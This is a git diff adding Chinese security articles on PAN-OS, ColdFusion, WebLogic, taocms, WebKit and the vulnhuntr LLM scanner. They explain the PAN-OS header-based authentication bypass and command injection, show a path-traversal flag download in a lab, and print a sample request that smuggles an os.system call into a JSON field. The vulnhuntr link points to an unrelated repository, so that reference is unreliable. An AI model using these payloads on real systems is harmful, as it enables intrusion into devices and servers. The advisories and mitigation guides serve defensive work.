本通报由CNNVD技术支撑单位——北京神州绿盟科技有限公司、深信服科技股份有限公司、西安交大捷普网络科技有限公司、数字新时代(山东)数据科技服务有限公司、安恒愿景(成都)信息科技有限公司、网宿科技股份有限公司等技术支撑单位提供支持。
|
||||||
|
|
||||||
|
CNNVD将继续跟踪上述漏洞的相关情况,及时发布相关信息。如有需要,可与CNNVD联系。联系方式: cnnvd@itsec.gov.cn
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
44
doc/CNNVD关于Palo Alto Networks PAN-OS 安全漏洞的通报.md
Normal file
44
doc/CNNVD关于Palo Alto Networks PAN-OS 安全漏洞的通报.md
Normal file
@ -0,0 +1,44 @@
|
|||||||
|
# CNNVD关于Palo Alto Networks PAN-OS 安全漏洞的通报
|
||||||
|
原创 CNNVD CNNVD安全动态 2024-11-20 09:05
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**点击蓝字 关注我们**
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**漏洞情况**
|
||||||
|
|
||||||
|
近日,国家信息安全漏洞库(CNNVD)收到关于Palo Alto Networks PAN-OS 安全漏洞(CNNVD-202411-2328、CVE-2024-0012)情况的报送。攻击者可以利用漏洞在未授权的情况下访问后台管理界面,进而获取管理员权限,控制目标设备。PAN-OS多个版本均受此漏洞影响。目前,Palo Alto Networks官方已发布新版本修复了该漏洞,建议用户及时确认产品版本,尽快采取修补措施。
|
||||||
|
|
||||||
|
## 一漏洞介绍
|
||||||
|
|
||||||
|
|
||||||
|
Palo Alto Networks PAN-OS是美国Palo Alto Networks公司的一套为其防火墙设备开发的操作系统。Palo Alto Networks PAN-OS存在安全漏洞,该漏洞源于设备存在身份验证绕过问题,攻击者利用漏洞可以在未授权的情况下登录后台管理界面,进而获取管理员权限,控制目标设备。
|
||||||
|
|
||||||
|
## 二危害影响
|
||||||
|
|
||||||
|
|
||||||
|
PAN-OS 10.2-10.2.12-h之前版本、PAN-OS 11.0-11.0.6-h之前版本、PAN-OS 11.1-11.1.5-h之前版本、PAN-OS 11.2-11.2.4-h1之前版本均受此漏洞影响。
|
||||||
|
|
||||||
|
## 三修复建议
|
||||||
|
|
||||||
|
|
||||||
|
目前,Palo Alto Networks官方已发布新版本修复了该漏洞,建议用户及时确认产品版本,尽快采取修补措施。官方参考链接:
|
||||||
|
|
||||||
|
https://security.paloaltonetworks.com/CVE-2024-0012
|
||||||
|
|
||||||
|
本通报由CNNVD技术支撑单位——华为技术有限公司、奇安信网神信息技术(北京)股份有限公司、深圳市深信服信息安全有限公司、网宿科技股份有限公司、塞讯信息技术(上海)有限公司、杭州安恒信息技术股份有限公司、中孚安全技术有限公司、长扬科技(北京)股份有限公司、北京众安天下科技有限公司、上海云盾信息技术有限公司、广西网信信息技术有限公司等技术支撑单位提供支持。
|
||||||
|
|
||||||
|
CNNVD将继续跟踪上述漏洞的相关情况,及时发布相关信息。如有需要,可与CNNVD联系。联系方式:
|
||||||
|
cnnvd@itsec.gov.cn
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
@ -0,0 +1,99 @@
|
|||||||
|
# CVE-2024-20767 和 CVE-2024-21216 的补救措施:保护自己免受最近两个可在野外利用的严重漏洞的侵害
|
||||||
|
Ots安全 2024-11-20 10:39
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
CVE-2024-20767- ColdFusion 路径遍历可能导致读取重要数据
|
||||||
|
|
||||||
|
CVE-2024-20767是 ColdFusion 版本 2023.6、2021.12 及更早版本中的一个漏洞。这些版本受到不当访问控制漏洞的影响,可能允许任意文件系统读取。攻击者可以利用此漏洞绕过安全措施,未经授权访问敏感文件,并执行任意文件系统写入。利用此问题不需要用户交互。该漏洞的 CVSS 评分很高,因此对易受此漏洞影响的资产构成重大风险。
|
||||||
|
|
||||||
|
根据Fofa搜索引擎,全球有超过 145,000 个使用ColdFusion 的公共应用程序
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
并且,其中一些人让管理面板保持可访问状态,而上面的错误可能会利用这一点,因为根本原因是管理功能端点
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
攻击者可以轻松利用任何公开的漏洞,如以下示例
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
转到安全部分,然后允许 IP 地址并添加仅允许使用管理面板的本地 IP,此操作将限制可以使用管理功能的人员,以避免泄露 uuid,这对于ColdFusion安全流程中的特权非常重要
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
正如我们所看到的,应用更改后,我们现在无法利用目标,因为访问限制
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
CVE-2024-21216 – Weblogic 未经身份验证的 RCE
|
||||||
|
|
||||||
|
CVE-2024-21216是 Oracle Fusion Middleware(组件:Core)的 Oracle WebLogic Server 产品中的一个漏洞。受影响的受支持版本包括 12.2.1.4.0 和 14.1.1.0.0。这个易于利用的漏洞允许未经身份验证的攻击者通过T3和IIOP获得网络访问权限,从而入侵 Oracle WebLogic Server。成功利用此漏洞可导致 Oracle WebLogic Server 被接管。CVSS 基本评分为 9.8,非常严重。
|
||||||
|
|
||||||
|
PoC 尚未发布,但为了避免WebLogic服务器被接管,如下图所示,Nmap 扫描附带了一个 Weblogic 版本
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
要管理网络连接我们需要使用weblogic.security.net.ConnectionFilterImpl 来过滤对 T3 的访问
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
通过根据环境应用以下网络规则,它将限制对公共连接的访问以访问T3协议,以避免受到攻击
|
||||||
|
|
||||||
|
127.0.0.1 * * allow t3 t3s # 允许从本地主机访问 T3/T3s
|
||||||
|
|
||||||
|
<local_IP> * * allow t3 t3s # 允许从本地 IP 进行 T3/T3s 访问
|
||||||
|
|
||||||
|
<allowed_IP> * * allow t3 t3s # 允许来自特定受信任 IP 的 T3/T3s 访问
|
||||||
|
|
||||||
|
* * * 拒绝 t3 t3s # 拒绝所有其他 T3/T3s 访问
|
||||||
|
|
||||||
|
要禁用IIOP,请转到服务器,然后转到AdminServer(admin)配置
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
然后,转到“协议”,选择“IIOP” ,然后取消选中“启用 IIOP”以禁用此协议
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
然后通过运行./StopWeblogic.sh保存并重新启动 Weblogic,然后使用./StartWeblogic.sh重新启动它
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
再次运行 Nmap 扫描,结果显示握手失败,这是由于T3协议 的限制
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**推荐**
|
||||||
|
|
||||||
|
始终建议应用官方补丁。然而,在大型环境中,立即应用补丁可能不可行。在这篇博文中,我们的目标是手动限制漏洞风险,而不修补应用程序。请记住,这些缓解措施可能会限制访问并禁用应用程序中的某些功能
|
||||||
|
|
||||||
|
**参考**
|
||||||
|
|
||||||
|
https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html
|
||||||
|
|
||||||
|
https://docs.oracle.com/middleware/11119/wls/WLAPI/weblogic/security/net/ConnectionFilterImpl.html
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
感谢您抽出
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
.
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
.
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
来阅读本文
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**点它,分享点赞在看都在这里**
|
||||||
|
|
469
doc/DataCon晚自习 | 浅谈大模型辅助漏洞挖掘.md
Normal file
469
doc/DataCon晚自习 | 浅谈大模型辅助漏洞挖掘.md
Normal file
File diff suppressed because one or more lines are too long
109
doc/Palo Alto Networks零日防火墙漏洞是由开发人员的基本错误导致的.md
Normal file
109
doc/Palo Alto Networks零日防火墙漏洞是由开发人员的基本错误导致的.md
Normal file
@ -0,0 +1,109 @@
|
|||||||
|
# Palo Alto Networks零日防火墙漏洞是由开发人员的基本错误导致的
|
||||||
|
原创 Lucian Constanti 信息安全D1net 2024-11-20 08:52
|
||||||
|
|
||||||
|
点击上方“**蓝色字体**”,选择 “**设为星标**”
|
||||||
|
|
||||||
|
关键讯息,D1时间送达!
|
||||||
|
|
||||||
|
Palo Alto Networks防火墙近期被发现存在两个严重漏洞,攻击者可利用这两个漏洞组合,通过PAN-OS管理Web界面绕过身份验证并提升权限,最终获得root权限,完全控制设备。第一个漏洞(CVE-2024-0012)允许攻击者绕过身份验证,第二个漏洞(CVE-2024-9474)则是一个命令注入漏洞,可提升权限至root。目前,Palo Alto已发布修复程序,并建议管理员更新防火墙版本,同时限制管理界面访问权限。安全公司watchTowr的研究人员指出,这些漏洞源于开发过程中的基本错误,并提醒将PAN-OS管理界面暴露在互联网上极为危险。
|
||||||
|
|
||||||
|
|
||||||
|
攻击者正在利用两个漏洞的组合,通过PAN-OS管理Web界面绕过身份验证并提升权限,从而在Palo Alto Networks防火墙上获得root权限。
|
||||||
|
|
||||||
|
Palo Alto Networks已为其防火墙和虚拟安全设备发布了两个正在被积极利用的漏洞的修复程序。当这两个漏洞同时存在时,攻击者可以在底层的PAN-OS操作系统上以最高权限执行恶意代码,从而完全控制设备。
|
||||||
|
|
||||||
|
Palo Alto本月早些时候发布了一份咨询报告,警告客户其正在调查有关PAN-OS基于Web的管理界面中存在潜在远程代码执行(RCE)漏洞的报告,并建议客户遵循推荐的步骤来确保对该界面的安全访问。
|
||||||
|
|
||||||
|
在调查过程中,该公司发现这次RCE攻击并非由单一漏洞导致,而是由两个漏洞共同造成。这两个漏洞都已在针对管理界面暴露在互联网上的设备的有限攻击中被利用。
|
||||||
|
|
||||||
|
**身份验证绕过和权限提升**
|
||||||
|
|
||||||
|
第一个漏洞(CVE-2024-0012)被评为严重级别,评分为10分中的9.3分。通过利用此漏洞,攻击者可以绕过身份验证并获得管理界面的管理权限,从而执行管理操作并更改配置。
|
||||||
|
|
||||||
|
尽管这已经很糟糕,但它并不会直接导致整个系统被攻陷,除非这一功能能被用来在底层操作系统上执行恶意代码。
|
||||||
|
|
||||||
|
事实证明,攻击者通过第二个漏洞(CVE-2024-9474)找到了这样一种方法,该漏洞允许任何拥有Web界面管理权限的人以root身份(即最高权限)在基于Linux的操作系统上执行代码。
|
||||||
|
|
||||||
|
这两个漏洞均影响PAN-OS 10.2、PAN-OS 11.0、PAN-OS 11.1和PAN-OS 11.2版本,目前这些版本都已获得补丁。
|
||||||
|
|
||||||
|
**漏洞源于疏忽**
|
||||||
|
|
||||||
|
来自安全公司watchTowr的研究人员对Palo Alto的补丁进行了逆向工程,以分析这两个漏洞,并得出结论认为,这些漏洞是开发过程中基本错误的结果。
|
||||||
|
|
||||||
|
为了验证用户访问页面是否需要身份验证,PAN OS管理界面会检查请求的X-Pan-Authcheck标头是否设置为on或off。将请求转发到托管Web应用的Apache服务器的Nginx代理服务器会根据请求的路由自动将X-Pan-Authcheck设置为on。在某些情况下,由于位置(例如/unauth/目录)应无需身份验证即可访问,因此X-Pan-Authcheck被设置为off,但除了/unauth/之外,几乎所有其他位置都应将该标头设置为on,这应导致用户被重定向到登录页面。
|
||||||
|
|
||||||
|
然而,watchTowr研究人员发现,一个名为uiEnvSetup.php的重定向脚本期望HTTP_X_PAN_AUTHCHECK的值被设置为off,如果请求中提供了这个值,服务器就会接受它。
|
||||||
|
|
||||||
|
“我们只需……在X-PAN-AUTHCHECK HTTP请求标头中提供off值,服务器就会贴心地关闭身份验证?!”研究人员在报告中写道,“到了这一步,还有谁会感到惊讶呢?”
|
||||||
|
|
||||||
|
第二个漏洞同样源于疏忽,它是一个命令注入漏洞,允许将shell命令作为用户名传递给名为AuditLog.write()的函数,然后该函数将注入的命令传递给pexecute()。但根据研究人员的说法,传递给这个日志函数的负载实际上是另一个功能的结果,而这个功能本身也相当可怕。
|
||||||
|
|
||||||
|
该功能允许Palo Alto Panorama设备指定其希望模拟的用户和用户角色,然后无需提供密码或通过双因素身份验证即可为其获得完全认证的PHP会话ID。
|
||||||
|
|
||||||
|
综上所述,由于这种软件设计,攻击者可以将shell负载作为用户名字段的一部分来模拟特定用户和角色,然后该负载将被传递给AuditLog.write(),接着传递给pexecute(),最终在底层操作系统上执行。
|
||||||
|
|
||||||
|
“令人惊讶的是,这两个漏洞竟然出现在生产设备中,更令人惊讶的是,它们竟然通过Palo Alto设备底层潜伏的大量shell脚本调用而被允许存在,”研究人员在分析中写道。
|
||||||
|
|
||||||
|
**缓解措施**
|
||||||
|
|
||||||
|
除了将受影响的防火墙更新到最新发布的版本外,管理员还应将管理界面的访问权限限制为仅受信任的内部IP地址。管理界面也可以被隔离在专用的管理VLAN上,或者可以配置为通过所谓的跳转服务器访问,这些服务器需要先进行单独的身份验证。
|
||||||
|
|
||||||
|
将PAN-OS管理界面暴露在互联网上是非常危险的,因为这不是在此类设备中发现的第一个,也不太可能是最后一个RCE漏洞。今年早些时候,Palo Alto Networks修补了PAN-OS中的一个零日RCE漏洞(CVE-2024-3400),该漏洞被国家支持的黑客组织利用过。
|
||||||
|
|
||||||
|
Palo Alto Networks的威胁追踪团队正在追踪CVE-2024-0012和CVE-2024-9474的利用活动,并将其命名为Operation Lunar Peak,同时发布了与之相关的入侵指标。
|
||||||
|
|
||||||
|
“这次活动主要源自已知为匿名VPN服务代理/隧道流量的IP地址,”该团队表示,“观察到的后利用活动包括交互式命令执行和在防火墙上投放恶意软件,如Webshell。”
|
||||||
|
|
||||||
|
版权声明:本文为企业网D1Net编译,转载需在文章开头注明出处为:企业网D1Net,如果不注明出处,企业网D1Net将保留追究其法律责任的权利。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**2024全国甲方IT选型大会 将于11月29-30日在南京盛大召开,欢迎您扫描下方二维码报名↓↓↓。**
|
||||||
|
|
||||||
|
****
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
(来源:企业网D1Net)
|
||||||
|
|
||||||
|
**关于企业网D1net(www.d1net.com)**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
国内主流的to B IT门户,同时在运营国内最大的甲方CIO专家库和智力输出及社交平台-信众智(www.cioall.com)。旗下运营19个IT行业公众号(
|
||||||
|
微信搜索D1net即可关注)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
如果您在企业IT、网络、通信行业的某一领域工作,并希望分享观点,欢迎给企业网D1Net投稿。
|
||||||
|
封面图片来源于摄图网
|
||||||
|
|
||||||
|
**投稿邮箱:**
|
||||||
|
|
||||||
|
editor@d1net.com
|
||||||
|
|
||||||
|
**合作电话:**
|
||||||
|
|
||||||
|
010-58221588(北京公司)
|
||||||
|
|
||||||
|
021-51701588(上海公司)
|
||||||
|
|
||||||
|
**合作邮箱:**
|
||||||
|
|
||||||
|
Sales@d1net.com
|
||||||
|
|
||||||
|
企业网D1net旗下信众智是CIO(首席信息官)的专家库和智力输出及资源分享平台,有五万多CIO专家,也是目前最大的CIO社交平台。
|
||||||
|
|
||||||
|
|
||||||
|
信众智对接CIO为CIO服务,提供数字化升级转型方面的咨询、培训、需求对接等落地实战的服务。也是国内最早的toB共享经济平台。同时提供猎头,选型点评,IT部门业绩宣传等服务。
|
||||||
|
|
||||||
|
**扫描 “**
|
||||||
|
**二维码**
|
||||||
|
**” 可以查看更多详情**
|
||||||
|
|
||||||
|

|
||||||
|
|
30
doc/taocms 3.0.1 本地文件泄露漏洞(CVE-2021-44983).md
Normal file
30
doc/taocms 3.0.1 本地文件泄露漏洞(CVE-2021-44983).md
Normal file
@ -0,0 +1,30 @@
|
|||||||
|
# taocms 3.0.1 本地文件泄露漏洞(CVE-2021-44983)
|
||||||
|
原创 張童學 Nick安全 2024-11-20 07:54
|
||||||
|
|
||||||
|
### 0x01、漏洞环境
|
||||||
|
|
||||||
|
1、春秋云境:
|
||||||
|
http://eci-2zecoe6tugruhx5kvq29.cloudeci1.ichunqiu.com:80
|
||||||
|
|
||||||
|

|
||||||
|
### 0x02、漏洞介绍
|
||||||
|
|
||||||
|
1、taocms 3.0.1 登陆后台后文件管理处存在任意文件下载漏洞。
|
||||||
|
### 0x03、漏洞复现
|
||||||
|
|
||||||
|
1、点击管理跳转到后台界面。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
2、查看管理界面源码存在弱口令。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
3、打开文件管理访问../../../下载flag
|
||||||
|
|
||||||
|

|
||||||
|
### 0x04、修复建议
|
||||||
|
|
||||||
|
1、为了防止这种攻击,建议升级到Taocms最新版本,或者对系统进行安全加固,例如限制文件下载权限,设置文件下载白名单等。同时,对于所有用户来说,密码安全也是非常重要的,强烈建议定期更换复杂且不易被猜测的密码。
|
||||||
|
|
||||||
|
|
314
doc/vulnhuntr:基于大语言模型和静态代码分析的漏洞扫描与分析工具.md
Normal file
314
doc/vulnhuntr:基于大语言模型和静态代码分析的漏洞扫描与分析工具.md
Normal file
@ -0,0 +1,314 @@
|
|||||||
|
# vulnhuntr:基于大语言模型和静态代码分析的漏洞扫描与分析工具
|
||||||
|
Alpha_h4ck FreeBuf 2024-11-20 11:27
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
**关于vulnhuntr**
|
||||||
|
|
||||||
|
|
||||||
|
## vulnhuntr是一款基于大语言模型和静态代码分析的安全漏洞扫描与分析工具,该工具可以算得上是世界上首款具备自主AI能力的安全漏洞扫描工具。
|
||||||
|
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
Vulnhuntr 利用 LLM 的强大功能自动创建和分析整个代码调用链,从远程用户输入开始,到服务器输出结束,以检测复杂的、多步骤的和严重影响安全的漏洞,而这些漏洞,远远超出了传统静态代码分析工具的能力。
|
||||||
|
##
|
||||||
|
|
||||||
|
**功能介绍**
|
||||||
|
|
||||||
|
##
|
||||||
|
|
||||||
|
|
||||||
|
当前版本的vulnhuntr支持检测和识别以下漏洞类别:
|
||||||
|
> 1、本地文件包含(LFI)
|
||||||
|
> 2、任意文件覆盖(AFO)
|
||||||
|
> 3、远程代码执行(RCE)
|
||||||
|
> 4、跨站点脚本(XSS)
|
||||||
|
> 5、SQL 注入(SQLI)
|
||||||
|
> 6、服务器端请求伪造(SSRF)
|
||||||
|
> 7、不安全的直接对象引用(IDOR)
|
||||||
|
|
||||||
|
##
|
||||||
|
|
||||||
|
**工具执行逻辑**
|
||||||
|
|
||||||
|
##
|
||||||
|
|
||||||
|

|
||||||
|
##
|
||||||
|
|
||||||
|
**工具要求**
|
||||||
|
|
||||||
|
|
||||||
|
##
|
||||||
|
> Python v3.10
|
||||||
|
|
||||||
|
##
|
||||||
|
|
||||||
|
**工具安装**
|
||||||
|
|
||||||
|
|
||||||
|
##
|
||||||
|
|
||||||
|
由于该工具基于Python 3.10开发,因此我们首先需要在本地设备上安装并配置好Python 3.10环境。我们建议使用pipx或 Docker 轻松安装和运行 Vulnhuntr。
|
||||||
|
###
|
||||||
|
### Docker安装
|
||||||
|
```
|
||||||
|
```
|
||||||
|
```
|
||||||
|
docker build -t vulnhuntr https://github.com/protectai/vulnhuntr.git#main
|
||||||
|
```
|
||||||
|
```
|
||||||
|
```
|
||||||
|
### pipx安装
|
||||||
|
```
|
||||||
|
```
|
||||||
|
```
|
||||||
|
pipx install git+https://github.com/protectai/vulnhuntr.git --python python3.10
|
||||||
|
```
|
||||||
|
```
|
||||||
|
```
|
||||||
|
### 源码安装
|
||||||
|
|
||||||
|
****```
|
||||||
|
```
|
||||||
|
```
|
||||||
|
git clone https://github.com/protectai/vulnhuntr
|
||||||
|
|
||||||
|
cd vulnhuntr && poetry install
|
||||||
|
```
|
||||||
|
```
|
||||||
|
```
|
||||||
|
|
||||||
|
**工具使用**
|
||||||
|
|
||||||
|
|
||||||
|
```
|
||||||
|
```
|
||||||
|
```
|
||||||
|
usage: vulnhuntr [-h] -r ROOT [-a ANALYZE] [-l {claude,gpt,ollama}] [-v]
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Analyze a GitHub project for vulnerabilities. Export your ANTHROPIC_API_KEY/OPENAI_API_KEY before running.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
options:
|
||||||
|
|
||||||
|
-h, --help 显示工具帮助信息和退出
|
||||||
|
|
||||||
|
-r ROOT, --root ROOT 项目根目录的路径
|
||||||
|
|
||||||
|
-a ANALYZE, --analyze ANALYZE
|
||||||
|
|
||||||
|
项目中要分析的特定路径或文件
|
||||||
|
|
||||||
|
-l {claude,gpt,ollama}, --llm {claude,gpt,ollama}
|
||||||
|
|
||||||
|
要使用的LLM客户端(默认:claude)
|
||||||
|
|
||||||
|
-v, --verbosity 增加输出的详细程度(-v表示INFO,-vv表示DEBUG)
|
||||||
|
|
||||||
|
```
|
||||||
|
```
|
||||||
|
```
|
||||||
|
|
||||||
|
**工具运行演示**
|
||||||
|
|
||||||
|
|
||||||
|
## 使用 Claude 分析整个存储库:
|
||||||
|
```
|
||||||
|
export ANTHROPIC_API_KEY="sk-1234"
|
||||||
|
|
||||||
|
vulnhuntr -r /path/to/target/repo/
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
使用 GPT-4o 分析文件,也可以指定子目录而不是文件:
|
||||||
|
```
|
||||||
|
export OPENAI_API_KEY="sk-1234"
|
||||||
|
|
||||||
|
vulnhuntr -r /path/to/target/repo/ -a server.py -l gpt
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
使用 Claude 和自定义端点运行来分析 /local/path/to/target/repo/repo-subfolder/target-file.py:
|
||||||
|
```
|
||||||
|
```
|
||||||
|
```
|
||||||
|
docker run --rm -e ANTHROPIC_API_KEY=sk-1234 -e ANTHROPIC_BASE_URL=https://localhost:1234/api -v /local/path/to/target/repo:/repo vulnhuntr:latest -r /repo -a repo-subfolder/target-file.py
|
||||||
|
```
|
||||||
|
```
|
||||||
|
```
|
||||||
|
### 输出样例
|
||||||
|
```
|
||||||
|
scratchpad:
|
||||||
|
|
||||||
|
Analyzing the add_llm function in llm_app.py. 2. Identified user input used as keys to access dictionaries: EmbeddingModel, ChatModel, RerankModel,
|
||||||
|
|
||||||
|
CvModel, and TTSModel. 3. These dictionaries contain class references, which are instantiated with user-supplied parameters. 4. The factory variable is
|
||||||
|
|
||||||
|
directly used from user input (req['llm_factory']) without proper validation. 5. The llm_name is also derived from user input in most cases. 6. The
|
||||||
|
|
||||||
|
instantiation of these classes occurs in try-except blocks, but exceptions are only used for error messages, not preventing execution. 7. The api_key
|
||||||
|
|
||||||
|
and other sensitive information are passed directly to these instantiated classes. 8. There's no comprehensive input validation or sanitization for the
|
||||||
|
|
||||||
|
factory or llm_name variables. 9. The vulnerability is in a route decorated with @login_required, indicating it's accessible to authenticated users. 10.
|
||||||
|
|
||||||
|
Reviewing the EmbeddingModel, ChatModel, RerankModel, CvModel, and TTSModel dictionaries to understand their contents and potential for exploitation.
|
||||||
|
|
||||||
|
----------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
analysis:
|
||||||
|
|
||||||
|
The add_llm function in llm_app.py contains a critical Remote Code Execution (RCE) vulnerability. The function uses user-supplied input
|
||||||
|
|
||||||
|
(req['llm_factory'] and req['llm_name']) to dynamically instantiate classes from the EmbeddingModel, ChatModel, RerankModel, CvModel, and TTSModel
|
||||||
|
|
||||||
|
dictionaries. This pattern of using user input as a key to access and instantiate classes is inherently dangerous, as it allows an attacker to
|
||||||
|
|
||||||
|
potentially execute arbitrary code. The vulnerability is exacerbated by the lack of comprehensive input validation or sanitization on these
|
||||||
|
|
||||||
|
user-supplied values. While there are some checks for specific factory types, they are not exhaustive and can be bypassed. An attacker could potentially
|
||||||
|
|
||||||
|
provide a malicious value for 'llm_factory' that, when used as an index to these model dictionaries, results in the execution of arbitrary code. The
|
||||||
|
|
||||||
|
vulnerability is particularly severe because it occurs in a route decorated with @login_required, suggesting it's accessible to authenticated users,
|
||||||
|
|
||||||
|
which might give a false sense of security.
|
||||||
|
|
||||||
|
----------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
poc:
|
||||||
|
|
||||||
|
POST /add_llm HTTP/1.1
|
||||||
|
|
||||||
|
Host: target.com
|
||||||
|
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
Authorization: Bearer <valid_token>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
{
|
||||||
|
|
||||||
|
"llm_factory": "__import__('os').system",
|
||||||
|
|
||||||
|
"llm_name": "id",
|
||||||
|
|
||||||
|
"model_type": "EMBEDDING",
|
||||||
|
|
||||||
|
"api_key": "dummy_key"
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
This payload attempts to exploit the vulnerability by setting 'llm_factory' to a string that, when evaluated, imports the os module and calls system.
|
||||||
|
|
||||||
|
The 'llm_name' is set to 'id', which would be executed as a system command if the exploit is successful.
|
||||||
|
|
||||||
|
----------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
confidence_score:
|
||||||
|
|
||||||
|
8
|
||||||
|
|
||||||
|
----------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
vulnerability_types:
|
||||||
|
|
||||||
|
- RCE
|
||||||
|
|
||||||
|
----------------------------------------
|
||||||
|
```
|
||||||
|
##
|
||||||
|
|
||||||
|
**许可证协议**
|
||||||
|
|
||||||
|
|
||||||
|
##
|
||||||
|
|
||||||
|
本项目的开发与发布遵循
|
||||||
|
AGPL-3.0
|
||||||
|
开源许可协议。
|
||||||
|
##
|
||||||
|
|
||||||
|
**项目地址**
|
||||||
|
|
||||||
|
|
||||||
|
##
|
||||||
|
|
||||||
|
**vulnhuntr**:
|
||||||
|
|
||||||
|
|
||||||
|
https://github.com/daniel2005d/mapXplore
|
||||||
|
|
||||||
|
|
||||||
|
【
|
||||||
|
FreeBuf粉丝交流群招新啦!
|
||||||
|
|
||||||
|
在这里,拓宽网安边界
|
||||||
|
|
||||||
|
甲方安全建设干货;
|
||||||
|
|
||||||
|
乙方最新技术理念;
|
||||||
|
|
||||||
|
全球最新的网络安全资讯;
|
||||||
|
|
||||||
|
群内不定期开启各种抽奖活动;
|
||||||
|
|
||||||
|
FreeBuf盲盒、大象公仔......
|
||||||
|
|
||||||
|
扫码添加小蜜蜂微信回复「加群」,申请加入群聊
|
||||||
|
】
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|

|
||||||
|
> https://protectai.com/threat-research/vulnhuntr-first-0-day-vulnerabilities
|
||||||
|
> https://huntr.com/
|
||||||
|
|
||||||
|
|
||||||
|
>
|
||||||
|
>
|
||||||
|
>
|
||||||
|
>
|
||||||
|
>
|
||||||
|
>
|
||||||
|
>
|
||||||
|
>
|
||||||
|
>
|
||||||
|
>
|
||||||
|
>
|
||||||
|
>
|
||||||
|
>
|
||||||
|
>
|
||||||
|
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302087&idx=1&sn=29d91904d6471c4b09f4e574ba18a9b2&chksm=bd1c3a4c8a6bb35aa4ddffc0f3e2e6dad475257be18f96f5150c4e948b492f32b1911a6ea435&token=21436342&lang=zh_CN&scene=21#wechat_redirect)
|
||||||
|
|
||||||
|
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302006&idx=1&sn=18f06c456804659378cf23a5c474e775&scene=21#wechat_redirect)
|
||||||
|
|
||||||
|
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651253272&idx=1&sn=82468d927062b7427e3ca8a912cb2dc7&scene=21#wechat_redirect)
|
||||||
|
|
||||||
|

|
||||||
|
|
91
doc/【安全圈】苹果发布紧急安全更新修复WebKit引擎中的漏洞 黑客已经利用漏洞展开攻击.md
Normal file
91
doc/【安全圈】苹果发布紧急安全更新修复WebKit引擎中的漏洞 黑客已经利用漏洞展开攻击.md
Normal file
@ -0,0 +1,91 @@
|
|||||||
|
# 【安全圈】苹果发布紧急安全更新修复WebKit引擎中的漏洞 黑客已经利用漏洞展开攻击
|
||||||
|
安全圈 2024-11-20 11:00
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
**关键词**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
安全漏洞
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
苹果本周发布安全公告宣布对 WebKit 引擎的两处高危安全漏洞进行修复,值得注意的是这些漏洞在修复前已经遭到黑客的积极利用,因此属于零日漏洞的范畴。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**CVE-2024-44308:**
|
||||||
|
|
||||||
|
黑客可以通过特制的 Web 内容导致任意代码执行,苹果获得的报告称该漏洞可能已经在基于 Intel 的 Mac 系统上被积极利用。
|
||||||
|
|
||||||
|
**CVE-2024-44309:**
|
||||||
|
|
||||||
|
黑客可以通过特制的 Web 内容导致跨站脚本攻击,苹果获得的报告称该漏洞可能已经在基于 Intel 的 Mac 系统上被积极利用。
|
||||||
|
|
||||||
|
值得注意的是以上漏洞也在 iOS 和 iPadOS 中存在,因此苹果还发布了 iOS 18.1.1 和 iPadOS 18.1.1 版进行修复,不过暂时没有证据表明黑客也在 iOS 和 iPadOS 平台进行攻击。
|
||||||
|
|
||||||
|
